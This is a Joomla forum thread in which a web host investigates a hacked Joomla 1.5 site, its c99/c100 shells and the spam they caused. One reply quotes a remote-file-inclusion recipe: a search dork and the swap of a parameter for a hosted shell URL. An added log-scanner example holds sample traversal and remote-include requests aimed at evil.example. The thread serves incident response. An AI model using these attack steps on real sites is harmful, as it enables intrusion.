[solved] Finding the entry point of the hack
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
[solved] Finding the entry point of the hack
Hello guys,
Straight to the subject:
We are the host and we have a hacked website. The webmaster said this: "our site is security level 5 and we know that is technically impossible to insert files in the server through the website". <- no comments about this
Due to this issue our server has been going down a lot since last week, when we discovered the hack, and we have mail spam going out of the server.
Searching the website folder we found a few files with malicious code.
I need help to find out how the hacker placed those files on the server.
What kind of attack was it?
Was it really an entry point through the website?
Anyway, I need more information and I prefer advice / suggestions / ideas from this forum because I need to prepare a proper answer to our client.
The website is Joomla 1.5 and I already checked with the jts-post_1.1.1 script to see the 3rd party components / modules; they are not in the vulnerable extension list.
Can I paste here the PHP code that we found?
The file is CPhack.php.
I hope I wrote a clear explanation; if not, just say so and I will try my best in the next post.
- alikon
- Joomla! Champion
- Posts: 5941
- Joined: Fri Aug 19, 2005 10:46 am
- Location: Roma
- Contact:
Re: Finding the entry point of the hack
rodajr wrote: "we know that is technically impossible to insert files in the server through the website"
Have you heard about RFI? Read this on Wikipedia.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
- Delete ALL the folders and files on the server. That's ALL the folders and files (you can leave the configuration.php if you physically inspect it).
- Check ALL the computers that have server access for malware etc. That's ALL the computers that have server access.
- Change your passwords.
- Use the files from the Joomla full package to upload to the server. All except the /installation folder.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Yes sir, I did.
And that particular article made me post here.
I want to know exactly how the attack happened to prevent future problems and learn.
I'm studying the case, just need a few directions.
Just learned that it seems to be 3 injection attacks, but I'm looking for the entry.
I checked this so far:
http://docs.joomla.org/Security_Checkli ... rver_Setup
http://forum.joomla.org/viewtopic.php?f=432&t=590555
and others
and meanwhile our server administrator is running a few countermeasures.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Finding the entry point of the hack
Running and posting the jts results will help give a clue to what's going on.
Checklist 7 is also a good read.
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Thank you for the replies.
Webdongle, I checked the link you posted before, but I want to know how this happened.
We are not going to wipe the Joomla from our server yet; the webmaster is "trying" to clean his work. He is not from our company.
We are trying to figure out what is happening to our server.
We think the hacker got into the website, placed files to do brute force and used our server to send spam.
I will paste the code here.
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Mandville, thank you.
Yes I did it too. I saw your posts around.
I can't use the script right now because the webmaster put the site offline.
Here is what I have now.
Last edited by alikon on Tue Aug 02, 2011 7:19 pm, edited 1 time in total.
Reason: hack code removed
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
I can't post the script info yet, meanwhile...
This file I posted is the CPhack.php we found in the root folder of the website.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
rodajr wrote: ... I can't use the script right now because the webmaster put the site offline. ...
Which site? The one that should have been deleted or the files from a fresh Joomla full package?
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
The hacked one.
Like I said, we are the host only. The webmaster thinks our server is the problem. And right now he is checking his Joomla.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
rodajr wrote: ... Like I said, we are the host only. The webmaster thinks our server is the problem. And right now he is checking his Joomla.
Ok, I'm with it now.
The jts post assistant will run even if the site is set Offline. The question is, do you have the right to run it on the server to (what can only be described as) spy on his setup? If you tick the boxes it will tell you a lot of info, including all the extensions used. That way you can see if he is using any extensions on the VEL, and a wealth of other information.
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
It isn't running. The webmaster is working.
This is the message:
jtablesession::Store Failed
DB function failed with error number 145
Table './our_bd/jos_session' is marked as crashed and should be repaired SQL=INSERT INTO `jos_session` ( `session_id`,`time`,`username`,`gid`,`guest`,`client_id` ) VALUES ( '84b058cd0196f4b1d2153b97ae52cf32','1312317081','','0','1','0' )
This is one of our problems: the webmaster, our client hired him.
PS: the "dude" doesn't know what happened and he is saying it is an issue on our server. He tried to fix some Joomla database problem. Oh boy!! This is going to be a hell of a week :(
The webmaster is trying to put the fault on us.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
But it ran before ? I tested on a 1.5 local install with site Offline and it worked for me. So if it worked before then someone has messed with something on the site or in the database.
Addendum
Have you checked the access logs for ../../../../ type paths ?
Last edited by Webdongle on Tue Aug 02, 2011 9:07 pm, edited 1 time in total.
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Yes, it ran.
I checked all their components on the extension list for vulnerabilities.
We have to wait for the damn guy to fix what he is trying to do;
it is complicated.
Well, meanwhile we changed the passwords of all the client's emails due to the warning of spam.
We put some brute-force protection on. So far, 6 hours without problems on the server.
Coincidence or not, the website was offline too.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
Have you checked the access logs for ../../../../ type paths ?
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Ok guys. I will not update until tomorrow.
Thank you for all replies and attention. Talk to you in a bit.
cya
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Hello guys,
I did it.
JTS-post Diagnostic Information wrote:
Joomla! Version: AIserver .0 Production/Stable [ Khepri ] Agosto-2008 23:55 GMT
configuration.php: Writable (Mode: 644 ) | Architecture/Platform: Linux 2.6.18-194.26.1.el5xen ( x86_64) | Web Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 ( http://******) | PHP Version: 5.2.9
PHP Requirements: register_globals: Disabled | magic_quotes_gpc: Enabled | safe_mode: Disabled | MySQL Support: Yes | XML Support: Yes | zlib Support: Yes
mbstring Support (1.5 or above): No | iconv Support (1.5 or above): Yes | save.session_path: Writable | Max.Execution Time: 30 seconds | File Uploads: Enabled
MySQL Version: 5.0.92-community ( Localhost via UNIX socket )
JTS-post Extended Information wrote:
SEF: Disabled | Legacy Mode: N/A | FTP Layer: N/A | htaccess: Implemented
PHP/suExec: User and Web Server accounts are the same. (PHP/suExec probably installed)
PHP Environment: API: cgi | MySQLi: No | Max. Memory: 32M | Max. Upload Size: 2M | Max. Post Size: 8M | Max. Input Time: 60 | Zend Version: 2.2.0
Disabled Functions:
MySQL Client: 5.0.92 ( latin1 )
So, our server was up for about 12 hours, then the webmaster put his Joomla on and our server went down again.
- mandville
- Joomla! Master
- Posts: 15152
- Joined: Mon Mar 20, 2006 1:56 am
- Location: The Girly Side of Joomla in Sussex
Re: Finding the entry point of the hack
I do not recognise that version of Joomla. Nothing we currently support is that old.
I would be tempted to surrender your client again unless they used a current secure version.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
http://docs.joomla.org/Khepri_Template_CSS
Oct 2008
http://www.projectamplify.com/joomla-15 ... plate.html
http://joomlawebhosting.ca/index.php?op ... whitelabel
"Since this is a core file it's best to copy this file to the root of the default front end template and then make edits. This will override the file at templates/system/offline.php"
Looks like it is an Administrator Template that some people install outside of the /administrator. Sounds like a possible way for a site to be hacked from?
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
We did a test with the file we found, CPhack.php.
This is a method to get the cPanel login and so on.
It just opens a page on the website showing information, and does not save it in a file inside the server. The file has an encrypted part with this information:
Ok. Fact: someone found an entry in the website, did a PHP injection, put the file into the server (website folder), got information and started to use our server as a spam sender.
Questions remain:
- still, what entry point?
- why does our server go down because of it? (when the website was offline, and I mean his database, the server stayed up, running normally and not sending spam out)
We are checking logs and monitoring.
Last edited by mandville on Wed Aug 03, 2011 6:13 pm, edited 1 time in total.
Reason: removed script
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
What extensions were installed ?
Are there any ../../../ type URLs in the logs?
- rodajr
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
I will do a list of what they have on it:
************
Administrator Components
Component Name Version Author Author Site Type
Polls v1.5.0 Joomla! Project www.joomla.org Core
This component manages polls...
Banners v1.5.0 Joomla! Project www.joomla.org Core
This component manages banners and banner clients...
HsConfig v1.0.3 Ken Lowther www.joomlanook.com 3rd Party
ccNewsletter v1.0.4 Stable AI www.aiserver.com.br 3rd Party
Sistema de newsletter...
Contact Items v1.0.0 Joomla! Project www.joomla.org Core
Parameters for individual Contact Items...
Contact v1.5.0 Joomla! Project www.joomla.org Core
This component shows a listing of Contact Information...
Trash v1.0.0 Joomla! Project www.joomla.org Core
PARAMTRASH...
Frontpage v1.5.0 Joomla! Project www.joomla.org Core
This Component shows all the published Articles from your site marked Show on Front Page....
Configuration Manager v1.5.0 Joomla! Project www.joomla.org Core
Configuration Manager...
JCE v1.5.7 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE ADMIN DESC...
Media Manager v1.5.0 Joomla! Project www.joomla.org Core
This component manages site media...
Zoo v1.0.4 YOOtheme www.yootheme.com 3rd Party
Zoo Joomla 1.5 component from YOOtheme.com (http://www.yootheme.com)...
Cache Manager v1.5.0 Joomla! Project www.joomla.org Core
Cache Manager...
Language Manager v1.5.0 Joomla! Project www.joomla.org Core
Language Manager...
User Manager v1.5.0 Joomla! Project www.joomla.org Core
User Manager...
Plugin Manager v1.5.0 Joomla! Project www.joomla.org Core
Plugin Manager...
Module Manager v1.5.0 Joomla! Project www.joomla.org Core
Module Manager...
Installation Manager v1.5.0 Joomla! Project www.joomla.org Core
Installation Manager...
Menus Manager v1.5.0 Joomla! Project www.joomla.org Core
Menu Manager...
Search v1.5.0 Joomla! Project www.joomla.org Core
DESCSEARCH...
Messaging v1.5.0 Joomla! Project www.joomla.org Core
Messaging...
Template Manager v1.5.0 Joomla! Project www.joomla.org Core
Template Manager...
Control Panel v1.5.0 Joomla! Project www.joomla.org Core
The Control Panel is the Home Page of the Joomla! Administrator Back-end...
Mass Mail v1.5.0 Joomla! Project www.joomla.org Core
DESCMASSMAIL...
Content Page v1.5.0 Joomla! Project www.joomla.org Core
DESCCONTENT...
Done Processing Administrator Components
Site Components
Component Name Version Author Author Site Type
Wrapper v1.5.0 Joomla! Project www.joomla.org Core
Wrapper...
MailTo v1.5.0 Joomla! Project www.joomla.org Core
A generic mail to friend component...
User v1.5.0 Joomla! Project www.joomla.org Core
User Self-Management...
Done Processing Site Components
Administrator Modules
Module Name Version Author Author Site Type
Done Processing Administrator Modules
Site Modules
Modules Name Version Author Author Site Type
Done Processing Site Modules
Site Plugins
Plugin Name Version Author Author Site Type
Editor - XStandard Lite for Joomla! v1.0 Joomla! Project www.joomla.org Core
DESCXSTANDARD
Editor - JCE 1.5.6 v1.5.6 Ryan Demmer www.joomlacontenteditor.net 3rd Party
JCE EDITOR DESC
Editor - None v1.0 3rd Party
This loads a basic text entry field
Editor - TinyMCE 3 v3.2.6 Moxiecode Systems AB tinymce.moxiecode.com/ 3rd Party
DESCTINYMCE
Content - Load Modules v1.5 Joomla! Project www.joomla.org Core
DESCLOADPOSITION
Content - Highslide v2.0.0 Ken Lowther www.joomlanook.com 3rd Party
HIGHSLIDE
Content - Vote v1.5 Joomla! Project www.joomla.org Core
Add the Voting functionality to Items
Content - Code Highlighter (GeSHi) v1.5 Joomla! Project qbnz.com/highlighter Core
DESCGESHI
Content - Example v1.0 Joomla! Project www.joomla.org Core
An example content plugin
Content - Email Cloaking v1.5 Joomla! Project www.joomla.org Core
DESCMOSEMAILCLOAK
Content - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCCONTENTPAGEBREAK
Content - KA Facebook Comments v1.5.x.2.3 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
KAFACEBOOKCOMMENTSPLG_INSTALLATION
Content - Page Navigation v1.5 Joomla! Project www.joomla.org Core
DESCPAGENAVIGATION
System - Modal Popup Content v1.0 DoJoomla www.dojoomla.com 3rd Party
Modal Popup Content
System - Log v1.5 Joomla! Project www.joomla.org Core
Provides system logging
AIeffects v1.5.0 FNC www.aiserver.com.br 3rd Party
AIeffects plugin
System - Remember Me v1.5 Joomla! Project www.joomla.org Core
Provides remember me functionality
System - Legacy v1.5 Joomla! Project www.joomla.org Core
Provides legacy support for older version of Joomla!
System - Cache v1.5 Joomla! Project www.joomla.org Core
Provides page caching
System - Backlinks v1.5 Joomla! Project www.joomla.org Core
Provides backlink support
System - SEF v1.5 Joomla! Project www.joomla.org Core
DESCPLGSYSTEMSEF
System - JavaScript SDK v1.5.x.3.3.1 Khawaib Ahmed www.Khawaib.co.uk 3rd Party
JASCRIPTSDK_INSTALLATION
System - Debug v1.5 Joomla! Project www.joomla.org Core
Provides debug information
User - Example v1.0 Joomla! Project www.joomla.org Core
An example user synchronisation plugin
User - Joomla! v1.5 Joomla! Project www.joomla.org Core
PLG_USER_JOOMLA
Search - Sections v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Content Section information
Search - Weblinks v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Weblinks Component
Search - Contacts v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Contacts Component
Search - Newsfeeds v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Newsfeeds
Search - Content v1.5 Joomla! Project www.joomla.org Core
ALLOWS SEARCHING OF ALL ARTICLES
Search - Zoo v1.0.2 YOOtheme www.yootheme.com 3rd Party
Zoo Search Joomla 1.5 plugin from YOOtheme.com (http://www.yootheme.com)
Search - Categories v1.5 Joomla! Project www.joomla.org Core
Allows Searching of Categories information
XML-RPC - Blogger API v1.0 Joomla! Project www.joomla.org Core
Blogger XML-RPC API
XML-RPC - Joomla API v1.0 Joomla! Project www.joomla.org Core
Joomla! XML-RPC API
Button - Image v1.0.0 Joomla! Project www.joomla.org Core
DESCIMAGE
Button - Readmore v1.5 Joomla! Project www.joomla.org Core
DESCREADMORE
Button - Pagebreak v1.5 Joomla! Project www.joomla.org Core
DESCPAGEBREAK
Authentication - Example v1.5 Joomla! Project www.joomla.org Core
An example of an authentication plugin
Authentication - LDAP v1.5 Joomla! Project www.joomla.org Core
Handles user authentication against an LDAP server
Authentication - Joomla v1.5 Joomla! Project www.joomla.org Core
Handles Joomlas default user authentication
Authentication - GMail v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with a GMail account
Authentication - OpenID v1.5 Joomla! Project www.joomla.org Core
Handles user authentication with an OpenID (Requires PHP5)
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
None of those appear to be up-to-date versions.
What about your access logs? Any ../../../../ type entries?
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Guys,
I'm already looking, but do you have something about the c99 shell?
We decrypted some code and that was a known name.
I know this is a tool for RFI. I need more safe material to study.
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
http://www.hackcommunity.com/Thread-How ... -shell-c99
use google to find site vulnerability: inurl:index.php?page=
Try the site is vulnerability just delete and replace http://www.google.com
example: http://www.vulnerabilitysite.com/index.php?page=HERE REPLACE!http://www.google.com then press enter if you get site like a google then site is vulnerability!Upload shell on http://www.110mb.com and replace url: http://www.google.com and that's it!
http://www.exploit-db.com/exploits/17603/
http://www.[youtube].com/watch?v=ylDzxXez ... re=related
Drag the bar about 2/3 along and watch how it's put in. Then you will see why I ask about access logs with ../../../../ in the URL.
http://www.[youtube].com/watch?v=o4NtQvgv ... re=related
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Webdongle,
Thank you dude! Really appreciate all your replies.
I couldn't check the logs; my co-worker is on server duty.
I was researching and studying the code.
Now I understand what you were asking me. I'll ask for all the logs we can get.
Question 1: can I find logs in Joomla too? I'm not an expert in Joomla; I have been studying it for about 2 months and just started to learn the code in it.
I checked the basic folders.
Question 2 (I'm still reading and watching the material you linked): the hacked website was using SEF; even with this, can the injection be used on the URL?
- Webdongle
- Joomla! Master
- Posts: 44093
- Joined: Sat Apr 05, 2008 9:58 pm
Re: Finding the entry point of the hack
To the best of my understanding
SEF URLs are 'symbolic' links that are routed to the normal links.
e.g.
If you have SEF from a menu item of
www.yoursite.com/search-site.html
then
http://www.yoursite.com/index.php?optio ... iew=search
will still reach the search page.
http://www.yoursite.com/index.php?optio ... iew=search is a great way to search a 1.5 even when there is no menu item. So if you don't put a search button on a site because you don't want Search, then go to Extensions >>> Install/Uninstall ... Components ... then just 'toggle' the green tick next to the Search module.
http://www.weblinksonline.co.uk/
https://www.weblinksonline.co.uk/updating-joomla.html
"When I'm right no one remembers but when I'm wrong no one forgets".
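A defender's check that ties together Webdongle's two points (look in the access logs for ../../../../ entries, and SEF aliases do not stop the raw index.php?option= form from being served), added here as an example and not code from the thread or from Joomla: it scans web-server access-log lines for traversal sequences and for a query parameter whose value is itself a URL, on every request rather than only the .html aliases. The log lines, IP addresses, hostnames and the com_example component are constructed.

```python
import re
import urllib.parse

# One Apache/nginx "combined" access-log line, as the host's web server writes it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicators asked about in the thread: repeated ../ (or ..\) traversal, and a
# parameter value that is a remote URL (remote file inclusion of a shell script).
TRAVERSAL_RE = re.compile(r'(?:\.\./|\.\.\\){2,}')
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)


def classify_request(path: str) -> list:
    """Return the indicator names found in one request path. The path is decoded
    twice so %2e%2e%2f and double-encoded variants are seen as plain ../."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(path))
    hits = []
    if TRAVERSAL_RE.search(decoded):
        hits.append("traversal")
    query = urllib.parse.urlsplit(decoded).query
    for _, value in urllib.parse.parse_qsl(query, keep_blank_values=True):
        if REMOTE_URL_RE.match(value):
            hits.append("remote-include")
            break
    return hits


def scan_log(lines) -> list:
    """Return (ip, time, path, indicators) for every suspicious line. Every request
    is checked: with SEF on, index.php?option=... requests are still answered."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        hits = classify_request(m.group("path"))
        if hits:
            findings.append((m.group("ip"), m.group("time"), m.group("path"), hits))
    return findings


# Constructed sample lines (fictional addresses, hostnames and component name).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/May/2011:21:14:02 +0000] "GET /search-site.html HTTP/1.1" 200 5120',
    '198.51.100.9 - - [27/May/2011:21:15:40 +0000] "GET /index.php?option=com_example&controller=../../../../../../etc/passwd%00 HTTP/1.1" 200 1832',
    '198.51.100.9 - - [27/May/2011:21:16:03 +0000] "GET /index.php?option=com_example&page=http://evil.example/c99.txt? HTTP/1.1" 200 9001',
    '203.0.113.7 - - [27/May/2011:21:17:11 +0000] "GET /index.php?option=com_search&view=search HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for ip, when, path, hits in scan_log(SAMPLE_LOG):
        print(f"{when} {ip} {','.join(hits)} {path}")
```

As PhilD notes later in the thread, a shell on the box can rewrite these logs, so treat an empty result as inconclusive rather than as proof the entry point was elsewhere.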
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Just to update this thread.
We did a few security measures on our server and we deleted the website, the whole thing, to make sure we had found some malicious files on the server.
Now we uploaded the website, with the hack scripts, and started monitoring the entries. Hope to find the weak spot before we ask the webmaster to upload a really clean version.
BTW, we found some files that led us to the c100 shell.
- PhilD
- Joomla! Hero
- Posts: 2737
- Joined: Sat Oct 21, 2006 10:20 pm
- Location: Wisconsin USA
- Contact:
Re: Finding the entry point of the hack
c99, c57, c100, and other variants are all server rootkit shells.
They enable the hacker in most cases to browse the entire server without any passwords required, as if it were a hard drive on his computer. This means the hacker can do whatever he wants to anything on the server, as well as anything to any domain, or any software (Joomla, WordPress etc.) installed on any domain. This includes installing backdoors to the server, installing additional malware/rootkits etc.
By having or leaving the c100 or any variants on the domain you are never going to fix the hack, and you are risking further infection of the server, if the server has not already been rooted.
Log files are mostly useless if the person knows how to use the shell, as the times and entries can be altered.
I would suggest you wipe your site and start over following checklist 7, and inform your host of the found shell script(s).
PhilD
-
- Joomla! Apprentice
- Posts: 24
- Joined: Fri May 27, 2011 8:26 pm
Re: Finding the entry point of the hack
Hi Phil,
Thanks for the info; you said a few things I wasn't aware of. Still studying what happened. BTW, this forum, this thread and the people who replied helped me a lot.
But we are the host, and this is the first time we have faced this. We are trying to learn how to prevent it in the future.
In my case, I really want to know the entry point in the Joomla.
We found a lot of "alien" files on the server, and my co-worker deleted them and tried to fix all the doors he found.
A question for you: if we clean what we have on the server now and put up the website with the alien script on it, what could happen? Failed attempts to get in again, or an open door?
Or, to start the whole thing again, does the hacker have to do the injection attack again, and so on?